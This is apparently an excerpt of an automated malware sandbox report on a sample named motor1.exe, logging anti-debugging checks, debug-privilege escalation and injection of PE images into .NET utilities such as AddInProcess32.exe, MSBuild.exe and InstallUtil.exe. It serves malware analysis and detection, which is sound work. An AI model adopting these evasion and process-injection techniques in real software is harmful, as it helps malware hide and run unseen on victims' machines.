Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: motor1.exe, 00000004.00000002.2544278781.00007FFD94758000.00000002.00000001.01000000.00000007.sdmp, motor1.exe, 00000015.00000002.2601305286.00007FFD928E8000.00000002.00000001.01000000.0000002C.sdmp	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F50C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt,
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2598521100.000002144CE8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B71380	4_2_00007FFD93B71380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B71330	4_2_00007FFD93B71330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E61380	4_2_00007FFD93E61380
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E61330	4_2_00007FFD93E61330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94261330	4_2_00007FFD94261330
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94261380	4_2_00007FFD94261380

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process queried: DebugPort
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFD93B71380 rdtsc

4_2_00007FFD93B71380

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFDA384A990 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FFDA384A990

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93D793A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFD93D793A0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD944DD978 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFD944DD978
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA384A5DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFDA384A5DC
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA384AB78 SetUnhandledExceptionFilter,	4_2_00007FFDA384AB78
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA384A990 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFDA384A990
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1BBAC0 SetUnhandledExceptionFilter,	21_2_00007FFD9B1BBAC0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1BBB30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00007FFD9B1BBB30
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1BB8D8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00007FFD9B1BB8D8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6A4008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C51008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 732008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: ABA008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: CAE008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 63E008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 111C008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 683008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 899008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 100A008	Jump to behavior
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: D1E008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8B008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
